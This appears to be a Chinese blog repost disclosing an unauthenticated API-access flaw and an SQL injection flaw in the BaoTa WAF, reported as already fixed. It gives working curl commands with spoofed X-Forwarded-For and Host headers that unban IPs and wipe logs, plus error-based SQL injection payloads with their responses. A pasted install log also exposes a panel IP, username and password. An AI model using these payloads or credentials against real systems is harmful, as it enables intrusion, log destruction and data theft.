宝塔WAF防火墙最新版未授权访问漏洞+SQL 注入漏洞(已修复)
宝塔面板最新版安装
Linux面板8.0.5安装脚本
Centos安装脚本
yum install -y wget && wget -O install.sh https://download.bt.cn/install/install_6.0.sh && sh install.sh ed8484becUbuntu/Deepin安装脚本
wget -O install.sh https://download.bt.cn/install/install-ubuntu_6.0.sh && sudo bash install.sh ed8484becDebian安装脚本
wget -O install.sh https://download.bt.cn/install/install-ubuntu_6.0.sh && bash install.sh ed8484bec万能安装脚本
if [ -f /usr/bin/curl ];then curl -sSO https://download.bt.cn/install/install_panel.sh;else wget -O install_panel.sh https://download.bt.cn/install/install_panel.sh;fi;bash install_panel.sh ed8484bec国产龙芯架构安装脚本
wget -O install_panel.sh https://download.bt.cn/install/0/loongarch64/loongarch64_install_panel.sh && bash install_panel.sh ed8484bec注意:必须为没装过其它环境如Apache/Nginx/php/MySQL的新系统,推荐使用centos 7.X的系统安装宝塔面板
推荐使用Chrome、火狐、edge浏览器,国产浏览器请使用极速模式访问面板登录地址
如果不确定使用哪个Linux系统版本的,可以使用万能安装脚本
国产龙芯架构CPU安装命令,支持龙芯架构的loongnix 8.x、统信UOS 20、kylin v10系统
云WAF安装脚本
单机版脚本
URL=https://download.bt.cn/cloudwaf/scripts/install_cloudwaf.sh && if [ -f /usr/bin/curl ];then curl -sSO "$URL" ;else wget -O install_cloudwaf.sh "$URL";fi;bash install_cloudwaf.sh集群版脚本
URL=https://download.bt.cn/cloudwaf/scripts/install_waf_master.sh && if [ -f /usr/bin/curl ];then curl -sSO "$URL" ;else wget -O install_waf_master.sh "$URL";fi;bash install_waf_master.sh注意:已经安装了宝塔面板的机器,不用再安装云WAF,在宝塔面板上安装使用Nginx防火墙即可。
堡塔云WAF需要一台独立服务器安装部署。
安装完成后推荐使用Chrome、火狐、edge浏览器,国产浏览器(极速模式)访问登录系统
清理面板所有host检测节点(0.5s):download.bt.cn当前可用下载节点:download.bt.cn检测www节点(0.5S):{'name': '主节点', 'url': 'www-node1.bt.cn'}检测api节点(0.5S):{'name': '主节点', 'url': 'api-node1.bt.cn'}Stopping Bt-Tasks... doneStopping Bt-Panel... doneStarting Bt-Panel.... doneStarting Bt-Tasks... doneLoaded plugins: fastestmirrorLoading mirror speeds from cached hostfilePackage firewalld-0.6.3-13.el7_9.noarch already installed and latest versionNothing to doCreated symlink from /etc/systemd/system/dbus-org.fedoraproject.FirewallD1.service to /usr/lib/systemd/system/firewalld.service.Created symlink from /etc/systemd/system/multi-user.target.wants/firewalld.service to /usr/lib/systemd/system/firewalld.service.success==================================================================Congratulations! Installed successfully!========================面板账户登录信息==========================外网面板地址: https://8.141.89.22:35952/4c2265a0内网面板地址: https://172.17.225.236:35952/4c2265a0username: yusci8xmpassword: 7553f5d7=========================打开面板前请看===========================【云服务器】请在安全组放行 35952 端口因默认启用自签证书https加密访问,浏览器将提示不安全点击【高级】-【继续访问】或【接受风险并继续】访问教程:https://www.bt.cn/bbs/thread-117246-1-1.html==================================================================
未授权访问漏洞
2024年2月17日15:13发布更新:宝塔回应称该漏洞去年就已经修复,同时该漏洞仅可以查询数据、无法造成其他威胁。另外宝塔WAF防火墙与宝塔面板是两个产品,存在漏洞的产品是WAF防火墙,不是宝塔面板。
据 V2EX 网友发布的帖子,在春节期间他在研究宝塔面板的漏洞时,发现宝塔面板附带的 WAF 防火墙 (宝塔 Nginx 防火墙) 存在 SQL 注入漏洞。
宝塔面板的 WAF 本身是一款收费产品,购买并开通后可以用来拦截 CC 攻击或者 SQL 注入之类的,但没想到这个模块本身也存在 SQL 注入漏洞。
漏洞位于 /cloud_waf/nginx/conf.d/waf/public/waf_route.lua 中,构造满足特定条件的 IP 地址和域名的情况下,不需要进行任何验证即可访问宝塔面板 API。
而且还可以他通过将 x-forwarded-for header 设置为 127.0.0.1、域名设置为 127.0.0.251 来满足上面要求的条件。
配置 x-forwarded-for 头为 127.0.0.1 即可满足 ip 是 127.0.0.1 的条件
配置 host 头为 127.0.0.251 即可满足域名是 127.0.0.251 的条件
提供一条 curl 参数供大家参考
curl 'http://宝塔地址/API' -H 'X-Forwarded-For: 127.0.0.1' -H 'Host: 127.0.0.251'get_btwaf_drop_ip
这个 API 用来获取已经拉黑的 IP 列表,使用以下命令发起访问
curl 'http://btwaf-demo.bt.cn/get_btwaf_drop_ip' -H 'X-Forwarded-For: 127.0.0.1' -H 'Host: 127.0.0.251'remove_btwaf_drop_ip
这个 API 用来解封 IP ,提供一个 get 参数即可,使用以下命令发起访问
curl 'http://btwaf-demo.bt.cn/remove_btwaf_drop_ip?ip=1.2.3.4' -H 'X-Forwarded-For: 127.0.0.1' -H 'Host: 127.0.0.251'clean_btwaf_drop_ip
这个 API 用来解封所有 IP ,使用以下命令发起访问
curl 'http://btwaf-demo.bt.cn/clean_btwaf_drop_ip' -H 'X-Forwarded-For: 127.0.0.1' -H 'Host: 127.0.0.251'updateinfo
这个 API 看起来是更新配置用的,需要一个 types 参数做校验,但实际并没有什么用处,使用以下命令发起访问
curl 'http://btwaf-demo.bt.cn/updateinfo?types' -H 'X-Forwarded-For: 127.0.0.1' -H 'Host: 127.0.0.251'get_site_status
这个 API 用来获取网站的配置,server_name 参数需要提供网站的域名,使用以下命令发起访问
curl 'http://btwaf-demo.bt.cn/get_site_status?server_name=bt.cn' -H 'X-Forwarded-For: 127.0.0.1' -H 'Host: 127.0.0.251'clean_btwaf_logs
这个 API 用来删除宝塔的所有日志,使用以下命令发起访问
curl "http://btwaf-demo.bt.cn/clean_btwaf_logs" -H 'X-Forwarded-For: 127.0.0.1' -H 'Host: 127.0.0.251'后续还有一些 API 大同小异,不一一列举了
get_global_status
clear_speed_hit
clear_replace_hit
reset_customize_cc
clear_speed_countsize
SQL注入
代码位于 /cloud_waf/nginx/conf.d/waf/public/waf_route.lua 文件中,源文件是 luajit 编译后的内容,反编译一下即可看到源码
代码逻辑就在 get_site_status API 中,slot1 变量就是 server_name 参数。原理很简单,server_name 参数没有做任何校验就直接带入了 SQL 查询。
宝塔官网目前已经修复这个问题,拿之前的测试记录为例,试试以下命令:
curl "http://btwaf-demo.bt.cn/get_site_status?server_name='-extractvalue(1,concat(0x5c,database()))-'" -H 'X-Forwarded-For: 127.0.0.1' -H 'Host: 127.0.0.251'响应如下
{"status":false,"msg":"数据查询失败: XPATH syntax error: '\\btwaf': 1105: HY000."}从响应来看已经注入成功,通过 updatexml 的报错成功的爆出了库名叫 btwaf
继续执行以下命令:
curl "http://btwaf-demo.bt.cn/get_site_status?server_name='-extractvalue(1,concat(0x5c,version()))-'" -H 'X-Forwarded-For: 127.0.0.1' -H 'Host: 127.0.0.251'
响应如下
{"status":false,"msg":"数据查询失败: XPATH syntax error: '\\8.1.0': 1105: HY000."}从响应来看,mySQL 版本是 8.1.0
在继续执行以下命令
curl "http://btwaf-demo.bt.cn/get_site_status?server_name='-extractvalue(1,concat(0x5c,(select'hello,world')))-'" -H 'X-Forwarded-For: 127.0.0.1' -H 'Host: 127.0.0.251'响应如下
{"status":false,"msg":"数据查询失败: XPATH syntax error: '\\hello,world': 1105: HY000."}看起来 select ‘hello,world’ 也执行成功了,到此为止,基本可以执行任意命令。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论